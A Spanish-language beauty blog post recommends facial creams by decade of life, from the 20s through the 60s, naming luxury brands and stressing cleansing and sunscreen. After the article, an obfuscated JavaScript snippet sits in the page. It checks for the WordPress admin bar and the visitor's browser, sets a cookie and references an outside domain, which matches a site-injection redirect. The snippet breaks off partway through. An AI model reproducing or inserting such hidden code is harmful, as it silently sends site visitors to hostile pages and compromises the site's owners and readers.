Chicas, aunque nos duela admitirlo, el tiempo pasa para todas. Puede que algunas lo notemos más que otras y que la mayoría de nosotras nos cuidemos para reducir sus efectos, pero la realidad es que ninguna puede afirmar que el paso de los años no se nota. El caso es que, al igual que nosotras, nuestra piel también lo nota; tampoco ella es la misma que hace algunos años, sobre todo cuando hablamos de la piel de nuestro rostro. 

 

Por eso, hoy vamos a contaros las necesidades que dependiendo de la edad tiene nuestra piel y los remedios con los que conseguiremos reducir el impacto del tiempo en ella. Porque como es comprensible, nuestra piel no es igual en la adolescencia que en la menopausia. ¡Empezamos!

 

Cream for face or body in female hand. Smear cream on hand

 

A los 20:

 

La adolescencia es la primera etapa de nuestra vida en la que comenzamos a experimentar problemas cutáneos: acné, piel grasa, espinillas, sequedad… lo que nos hace, también por primera vez, preocuparnos por ello. El problema es que la gran mayoría de ellos son debidos a los cambios hormonales, lo que los hace difíciles de combatir; pero tranquilas, vamos a contaros un par de truquillos para que luzca perfecta.

 

Lo idóneo para esta edad es utilizar cremas que poseen más agua que aceite, poco espesas y que incluyan alfahidroxiácidos. De esta forma mejoraremos la textura de nuestra piel, a la vez que minimizamos los poros y los pequeños brotes de acné. En este sentido, Essential Energy Moisturizing Day Cream de Shiseido, cumple a la perfección con esta misión, puesto que hidrata y resalta la energía de la juventud, otorgando el cuidado esencial que necesitan las pieles más jóvenes.

 

Otro de los básicos para cuidar la piel a los 20 años, es limpiarla diariamente, tanto por la mañana como por la noche; acabar con los residuos y la suciedad que se amontonan en nuestro cutis.

 

A los 30:

 

A los treinta -en algunos casos un poco antes- empiezan a aparecer las primeras líneas de expresión alrededor de los ojos y los primeros signos de la edad. En muchos casos son a causa del cansancio, debido a que nuestra piel reduce la capacidad que tiene para formar colágeno; lo que impide que se recupere de igual manera.

 

Por suerte, son problemas fáciles de solucionar con cremas hidratantes que contengan vitamina C y ácido hialurónico, ya que aportan a nuestra piel la hidratación y la luminosidad que necesitamos. Para ello, la Créme Multi-Perfection de Dior o Multi-Activa Jour Créme Premiéres Rides Antyoxidante Peaux Séches de Clarins son muy buenas elecciones, puesto que permiten alisar y unificar la piel, permitiendo que se vea tersa y que mantenga la belleza y el brillo de la juventud. 

 

cropped shot of beautiful woman in bathrobe applying face cream

 

A los 40 y 50:

 

Tanto los 40 como los 50 son épocas en las que nuestra piel experimenta grandes cambios. Las arrugas se atenúan, la piel pierde elasticidad y luminosidad y los signos de la edad son cada vez más evidentes. Por ello, es necesario mantenerla hidratada y aportarle los nutrientes necesarios que le permitan regenerarse, mantenerse tersa y luminosa.

 

Para conseguirlo, necesitaremos cremas más nutritivas, que impulsen la renovación celular y mejoren la síntesis del colágeno, como la Crema Revitalizing Supreme y el Tratamiento Global Anti-Edad de Estée Lauder. Gracias a su nutritiva multi-acción podremos recuperar la elasticidad perdida, aumentar el colágeno y llenar de energía y luminosidad nuestro rostro; todo lo necesario, vaya.

 

Además de lo anterior, algo que siempre debemos de tener en mente es protegernos adecuadamente del sol. Usar protector solar, incluso los días nublados, es la mejor manera de prevenir la aparición de manchas y la acentuación de los signos de la edad, ¡no lo olvides!

 

A los 60:

 

Una vez que pasamos los 60 tenemos que intensificar la hidratación y los cuidados de nuestra piel si queremos conservar las vitaminas y el colágeno que ésta produce, ya que cada vez sus niveles son menores, y esto produce un envejecimiento más acelerado. 

 

Para actuar frente a este envejecimiento, debemos utilizar productos con un alto contenido en aceite y con una alta concentración de ácido hialurónico, lo que nos permitirá rehidratar y compensar la falta de nutrición de nuestra piel. Algunas de las cremas que nos pueden ayudar a resolver estas necesidades son Haute Exigence Multi-Intensive Jour Peaux Très Sèches de Clarins o LE LIFT Crema Firmeza – Antiarrugas Crème Fine de Channel, productos anti-edad que actúan eficazmente ante las pieles debilitadas por los cambios hormonales debidos a la edad, como las arrugas más profundas y la flacidez. Así, recuperaremos la luminosidad, la flexibilidad y la resistencia nuestro rostro.

 

 

Como ya comentamos antes, tanto la limpieza diaria como la protección solar son fundamentales para el cuidado de nuestra piel, por lo que nunca debemos dejarlas de lado, y menos, pasados los 60. Según pasan los años nuestra piel se debilita, y acentuar los cuidados es la mejor forma de prevenir.

 

Y es que el tiempo no perdona a nadie, por lo que si queremos reducir su impacto en nuestra imagen, deberemos escuchar y atender a las necesidades que nuestro cuerpo y nuestra piel tienen en cada momento, solo así seremos capaces de satisfacerlas.

 

¡Hasta la próxima chicas!

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone